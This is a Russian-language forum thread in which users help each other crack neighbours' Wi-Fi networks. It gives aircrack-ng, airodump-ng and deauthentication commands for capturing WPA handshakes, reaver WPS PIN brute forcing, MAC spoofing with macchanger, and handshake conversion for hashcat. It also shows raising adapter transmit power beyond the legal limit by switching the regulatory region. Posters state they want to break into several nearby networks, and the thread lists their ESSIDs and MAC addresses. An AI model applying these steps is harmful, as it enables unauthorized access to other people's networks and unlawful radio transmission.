В статье "Взлом Wi-Fi для чайников" airmon-ng start wlan1(то есть мы запустили внешний адаптер). aireplay-ng --deauth 5 -a a0:21:b7:a0:71:3c -c 00:24:2b:6d:3f:d5 wlan1( а здесь может надо заместо wlan1-------> mon0? проверял на ноутбуке без адаптера, с wlan0 команда не проводилась, а с mon0 прошла.
В статье была указана команда на увеличение мощности внешней антенны: root@bt:~# iw reg set BO root@bt:~# iwconfig wlan1 txpower 27 С этой командой мощность не проходила ,а с этой увеличил до 30 меняем регион iw reg set BO Затем: меняем мощность iw dev wlan1 set txpower fixed 3000 в итоге вместо 20dbm(для России) получаем 30dbm проверяем iwconfig wlan(x) в моём случае wlan1 Использовал антенну TL-WN7200ND.
если антена на 38дб (дай описание интерестно просто) то по идеи сигнал улутшится на 38дб, например сигнал -88дб то с антеной -50дб а этоо ооООчень ощютимая разница
Максимально допустимая мощность на выходе адаптера (не антенны!) никак не связана с антенной, которая подключается к нему. Мощность зависит от программного ограничения (того самого региона: Россия/Боливия/Япония/etc.) и от возможности самой железки (если она может выдать, скажем, 200 милливат максимум, то хоть какие команды прописывай - ватта из неё не выжать. Не спалив саму цепь, разумеется). Так что необходимо искать ТТХ самого чипа, на котором адаптер собран, либо экспериментально подбирать мощность (больше, чем железка способна выдать, программно её не задать, я вот к чему). А от антенны будет зависеть лишь усиление. По поводу антенны на 38 dB... Максимум усиления, которое я видел в сети - 24 dBi: http://www.ulmart.ru/goods/287694 Какого размера будет монстр с усилением 38 db - страшно представить, так что, по-видимому, где-то произошла путаница в понятиях... То, что раскачать на выходе 38 db, задав мощность 30 db адаптеру, и привернув антенну на 8 db - поверю, а вот подключить к адаптеру антенну на 38 децибелл - это уже можно потихоньку прохожих начинать прожаривать... По сабжу: думаю, что мощность адаптеров в пресловутой Боливии вообще не ограничена (то бишь, сколько из железа можно выжать - столько и выжимайте наздоровье). Во всяком случае, беглое чтение результатов в гугле заставляют думать именно так.
Ничего не выходит с конвертацией CAP/PCAP в HCCAP файл, не "он", ни офф-лайн. Пробовал выбирать wireshark'ом лучшие 4 пакета и все попавшиеся EAPOL'ы. Поочередно экспортировал во все доступные форматы. Пробовал без выделения пакетов конвертировать common view'овский и airodump'овский файл и ничего. Много гуглил с решением этого вопроса, всем просящим отвечают: "У вас плохой хейндшейк, ловите новый"... Хотя поломал 2 вафли этими хендшами, как они могут быть плохими? Все 4 пакета в пределах секунды. Скорость в 4000 - это ад, хочется попробовать hashcat, но из-за конвертации ничего не выходит... Поделитесь своими мыслями!
я в этом деле чайник, первый раз ломаю начал ломать с ноутбука со встроенным Wi-Fi запустил: root@bt:~# airodump-ng mon0 есть три точки с параметром PWR в деапазоне 40-70. в таблице текущих ассоциаций клиентов к точкам иногда появляться строчки, но редко в графе BSSID написано что-то кроеме (not associated) когда запускаю airodump-ng на запись пакетов только одной сети из списка в файл testcap.cap: там только одна строчка, оставил на сутки, проверил файл aircrack-ng и нечего. может я чего-то делаю не так?
to Alookard Пробуй делать разрыв клиента от АР, пример: aireplay-ng --deauth 5 -a F0:88:68:51:00:44 -c АА:26:B7:E5:3B:8E mon0 где: F0:88:68:51:00:44 - mac точки доступа АА:26:B7:E5:3B:8E - mac клиента, что коннектился к АР mon0 - твой девайс)) цифра 5 это количество потоков или как хз назвать чего, то, что точка отправляет для деассоциации юзера от АР..ставь цифру и более 20-30.. В таком случае при переподключении юзеров, словишь handshake ))
00:26:5A:6D:C8:B6 точка доступа, к которой ассоциируется клиент с маком 00:24:2C:13:9E:49 Это смотри под строками BSSID STATION PWR Rate Lost Packets Probes 00:26:5A:6D:C8:B6(точка) 00:24:2C:13:9E:49(клиент) //Почитай _http://www.levinkv.ru/wi-fi
funny_kaplan, спасибо, понял, но у меня там написано (not associated), почти всегда. почему так происходит? можно ли использовать airodump-ng и besside-ng mon0 одновременно? ок, пойду почитаю.. добавлю: начал ходить с ноутом по квартире: там столько точек доступа, что таблица текущих ассоциаций клиентов к точкам уходит за монитор больше 80 точек доступа. я обязан взломать несколько! запустил sudo wash -i mon0 - пока тоже нечего. от этой команды будет толк? как и от besside-ng mon0? Code: root@bt:~# aircrack-ng *.cap Opening f1-01.cap Opening f1-02.cap Opening kurg1-01.cap Opening n11-01.cap Opening nast1-01.cap Opening rozi1-01.cap Opening san1-01.cap Opening t11-01.cap Opening t11-02.cap Opening tes1-01.cap Opening tp-lin1-01.cap Opening wep.cap Opening wpa.cap Opening z11-01.cap Opening zhdan1-01.cap Read 247848 packets. # BSSID ESSID Encryption 1 00:1E:58:B7:CB:B5 Nastya_Home No data - WEP or WPA 2 F8:D1:11:50:1C:1C Portal No data - WEP or WPA 3 34:08:04:11:A3:BC tase4ka EAPOL+No data - WEP or WPA 4 F8:1A:67:64:87:D6 TP-LINK_6487D6 No data - WEP or WPA 5 1C:BD:B9:7A:DE:BD Zhdanov No data - WEP or WPA 6 F4:EC:38:D1:4D:04 kurguzov4ab EAPOL+No data - WEP or WPA ..... ..... 94 BC:AE:C5:A7:D5:7A 311 No data - WEP or WPA 95 90:F6:52:8A:32:50 VERA No data - WEP or WPA Index number of target network ? 1 Opening f1-01.cap Opening f1-02.cap Opening kurg1-01.cap Opening n11-01.cap Opening nast1-01.cap Opening rozi1-01.cap Opening san1-01.cap Opening t11-01.cap Opening t11-02.cap Opening tes1-01.cap Opening tp-lin1-01.cap Opening wep.cap Opening wpa.cap Opening z11-01.cap Opening zhdan1-01.cap Got no data packets from target network! Quitting aircrack-ng... Code: root@bt:~# airodump-ng -w f1 mon0 CH 4 ][ Elapsed: 2 hours 55 mins ][ 2013-05-12 13:33 ][ paused output ^ BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID A0:F3:C1:7E:48:10 -34 292 0 0 6 54e. WPA2 CCMP PSK rozita 00:1E:58:B7:CB:B5 -51 17774 0 0 2 54 . WPA2 CCMP PSK Nastya_Home 34:08:04:11:A3:BC -60 44872 503 0 11 54e. WPA2 CCMP PSK tase4ka 1C:BD:B9:7A:DE:BD -66 42512 0 0 11 54 WPA TKIP PSK Zhdanov F4:EC:38:D1:4D:04 -74 21759 33 0 11 54e. WPA2 CCMP PSK kurguzov4ab F8:1A:67:64:87:D6 -83 48814 0 0 6 54e. WPA2 CCMP PSK TP-LINK_6487D6 F8:D1:11:5C:AF:06 -82 15025 0 0 4 54e. WPA2 CCMP PSK svjat 00:18:39:2F:C0:58 -84 6059 0 0 6 54 WEP WEP Mashka B0:48:7A:C1:82:E4 -84 603 0 0 4 54e. WPA2 CCMP PSK Race 90:94:E4:31:DF:F0 -85 1561 0 0 11 54e WPA2 CCMP PSK mix@ 00:0E:F4:E0:97:00 -85 667 0 0 6 54e WPA2 CCMP PSK NikishaHome 00:27:22:8A:4C:C4 -85 943 0 0 1 54e. WEP WEP kurguz11a 94:0C:6D:C4:4D:28 -85 1874 0 0 1 54 . WPA2 CCMP PSK Network F0:7D:68:9D:03:06 -85 1744 0 0 9 54e. WPA2 CCMP PSK Sasha 54:E6:FC:B7:3C:0C -86 3863 0 0 4 54e. WPA CCMP PSK Tynycoon 84:C9:B2:AB:3B:D4 -86 324 0 0 1 54e WPA2 TKIP PSK Dom 54:E6:FC:DC:76:E8 -86 271 0 0 9 54e. WPA2 CCMP PSK 313k ^ 1C:7E:E5:40:F8:E8 -87 1529 0 0 2 54e. WPA2 CCMP PSK Broadcom 00:0E:F4:E0:6D:8A -87 1177 0 0 1 54 WPA2 CCMP PSK kievskaya ^ 90:F6:52:3D:D6:1E -87 9071 0 0 1 54e. WPA2 CCMP PSK PollyComm-16 C8:BE:19:B0:8D:66 -87 1182 0 0 8 54e WPA2 CCMP PSK DIR-300 00:14:D1:B5:46:33 0 413 0 0 1 54e WPA2 CCMP PSK Sanya BSSID STATION PWR Rate Lost Frames Probe (not associated) F8:D1:11:07:2A:78 -77 0 -12 0 5 (not associated) 00:1F:3C:73:F9:38 -79 0 -12 0 103 (not associated) 28:98:7B:3E:E3:3A -85 0 -12 0 32 svjat (not associated) 48:5D:60:06:E2:23 -87 0 -12 0 24
sudo reaver -i mon0 -b BC:AE:C5:713:17 -vv - много ошибок, идет повтор первого пина много раз (предположительно до бесконечности), пробовал разные точки.. возможно, нужно еще какой-то параметр
Возможно точка далеко, пробуй ночью, реально лучше ИМХО. запускай так: sudo reaver -i mon0 -b CC:5D:4E:98:2A:22 -a -vv -c 2 где -c это номер канала, на котором АР, в данном случае 2 //Убедись, что на точке есть WPS, может мак сменить свой надо хз..: так: sudo ifconfig wlan1 down sudo macchanger wlan1 --mac=BC:CF:CC:C5:2E:47 sudo ifconfig wlan1 up где wlan1 - это физический девайс --mac=BC:CF:CC:C5:2E:47 тут укажешь желаемый мак, вернее не желаемый, а тот, что ассоциируется с точкой. Мак этот ты выше знаешь как словить. //надо ставить macchanger, если его нет.
на одной работает медленно, а на другой все по прежнему. может быть я не тот мак ввел. пробовал на двух разных. может быть там защита, можно как-то узнать? что нужно написать, что бы я находил только клиентов? а то если ищу с точками, то на экран не влазят. а если к точке - то не находит, потому что там в графе (not associated). /что такое Decloak в airodump-ng? /в чем могут быть трудности? может быть, что у точек доступа хорошая связь и я их хорошо слышу, а они меня плохо и пользователей я плохо слышу? /почему в airodump-ng я не вижу PRW больше 90? это какое-то ограничение? его можно отключить? Code: root@bt:~# airodump-ng -w f1 mon0 CH 4 ][ Elapsed: 12 hours 26 mins ][ 2013-05-12 23:03 ][ Decloak: 34:08:04:11:A3:BC CH 10 ][ Elapsed: 12 hours 26 mins ][ 2013-05-12 23:03 ][ Decloak: 34:08:04:11:A3:BC CH 1 ][ Elapsed: 12 hours 38 mins ][ 2013-05-12 23:16 ][ paused output BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 34:08:04:11:A3:BC -26 149245 13307 0 11 54e. WPA2 CCMP PSK tase4ka F4:EC:38:D1:4D:04 -77 78610 4391 0 11 54e. WPA2 CCMP PSK kurguzov4ab F8:1A:67:64:87:D6 -70 152572 2499 0 6 54e. WPA2 CCMP PSK TP-LINK_6487D6 1C:BD:B9:7A:DE:BD -65 134592 424 0 11 54 WPA TKIP PSK Zhdanov 90:F6:52:3D:D6:1E -86 24729 2 0 1 54e. WPA2 CCMP PSK PollyComm-16 00:1E:58:B7:CB:B5 -79 66291 0 0 2 54 . WPA2 CCMP PSK Nastya_Home F8:D1:11:5C:AF:06 -83 26417 0 0 4 54e. WPA2 CCMP PSK svjat FC:C8:97:96:85:14 -83 8678 0 0 11 54e. WPA2 CCMP PSK UKrtelecom_V6PaS4 F8:1A:67:64:CA:68 -85 2706 0 0 6 54e. WPA2 CCMP PSK NIKOZA C8:BE:19:B6:92:64 -82 8482 0 0 7 54e WPA2 CCMP PSK DIR-300_MTM 94:0C:6D:C4:4D:28 -84 9318 0 0 1 54 . WPA2 CCMP PSK Network 00:1C:F0:3B:BD:FF -85 15212 0 0 2 54e. WEP WEP oleg4b69 00:18:39:2F:C0:58 -85 17304 0 0 6 54 WEP WEP Mashka 1C:7E:E5:40:F8:E8 -86 6081 0 0 2 54e. WPA2 CCMP PSK Broadcom F4:6D:04:8C:A3:04 -87 243 0 0 1 54e WPA2 CCMP PSK Sergey C8:3A:35:3E:28:E0 0 249 0 0 6 54e. WPA2 CCMP PSK Tenda_3E28E0 F4:EC:38:D6:AD:36 -86 20 0 0 11 54 . WPA2 CCMP PSK TP 84:C9:B2:AB:3B:D4 -87 536 0 0 1 54e WPA2 TKIP PSK Dom FC:C8:97:98:4C:00 -86 2594 0 0 6 54e. WPA2 CCMP PSK Myzuchenko F8:D1:11:18:4F:C2 -84 19409 0 0 1 54e. WPA2 MGT Shustrik F0:7D:68:9D:03:06 -86 5088 0 0 9 54e. WPA2 CCMP PSK Sasha BSSID STATION PWR Rate Lost Frames Probe 4:08:04:11:A3:BC CC:52:AF:12:6A:E8 0 12 - 1 1954 139993 34:08:04:11:A3:BC 00:16:6F:52:07:57 -56 0 -12 20 16965 tase4ka,Sunbel_pool,DOCOUA-Guest,Catering,Ketering,Sasha,ACK1,Botany Lobby,WiFiOffice 34:08:04:11:A3:BC 00:22:43:21:B1:59 -59 0 -12 23 14641 tase4ka,WWW-��_Network_1,NETGEAR 1C:BD:B9:7A:DE:BD 00:26:AB:17:70:27 -63 0 -12 0 94013 Zhdanov 1C:BD:B9:7A:DE:BD 78:DD:08:F2:BA:CB -75 0 -12 0 56402 Zhdanov (not associated) 1C:B0:94:B7:4A:53 -73 0 - 9 32 163 internet vid sumtel.ua,Edimax,valentain,BELTELECOM WIFI,Galyan,Ridne misto,dlink,McDonalds4,KeryaNe (not associated) 74:2F:68:DD:46:A8 -78 0 -12 0 49 Valdai (not associated) 90:C1:15:E6:87:61 -79 0 -12 0 6 SHTUKA (not associated) C8:60:00:43:E6:7E -80 0 -12 0 63 aireplay-ng --deauth применяю, но хендшейки не ловятсья. есть Decloak
Извиняюсь за то, что повторяюсь, но не получил ни одного ответа... "Ничего не выходит с конвертацией CAP/PCAP в HCCAP файл, не "он", ни офф-лайн. Пробовал выбирать wireshark'ом лучшие 4 пакета и все попавшиеся EAPOL'ы. Поочередно экспортировал во все доступные форматы. Пробовал без выделения пакетов конвертировать common view'овский и airodump'овский файл и ничего. Много гуглил с решением этого вопроса, всем просящим отвечают: "У вас плохой хейндшейк, ловите новый"... Хотя поломал 2 вафли этими хендшами, как они могут быть плохими? Все 4 пакета в пределах секунды. Скорость в 4000 - это ад, хочется попробовать hashcat, но из-за конвертации ничего не выходит... Поделитесь своими мыслями!"
Возможно в Вашем хендшейке не было Beacon пакетов. Можете попробовать в hashcat конверторе Essid ломаемой точки доступа прописать.
Никто не тестировал Wi-Fi адаптер TP-LINK TL-WN8200ND(имеет 2 антенны) и как она по сравнению TP-LINK TL-WN7200ND и ALFA AWUS036H . Имею TP-LINK TL-WN7200ND для российского рынка, неплохая антенна, но интересно они все идут на рынок с одинаковой мощностью или в Европу и Америку помощней? И если написано 27 db, будет ли поддерживаться в Windows или всё равно не больше 20 db разрешённых законодательством? P.S. Может кому пригодится: При использование Wi-Fi адаптера TP-LINK TL-WN7200ND программы часто не видят при сканировании сети(точки), помогает простое передергивание USB шнура из компьютера. Прочитал в интернете:Никакими командами и потченными драйверами, в том числе и правкой реестра мощность не регулируется, оно зашито в EEPROM (энерго независимая память) чипа. В линуксе менял мощность до 30dbm: ifconfig wlan1 down macchanger -r wlan1 (меняется автоматически свой MAC адрес) iw reg set BO iw dev wlan1 set txpower fixed 3000 ifconfig wlan1 up iwconfig wlan1(проверяем свой адаптер на выставленную мощность) После этого запускал airodump-ng и проверял точки на мощность сигнала, что при 20 dbm,что при 30 dbm мощность сигнала от точек, так и не изменилась.
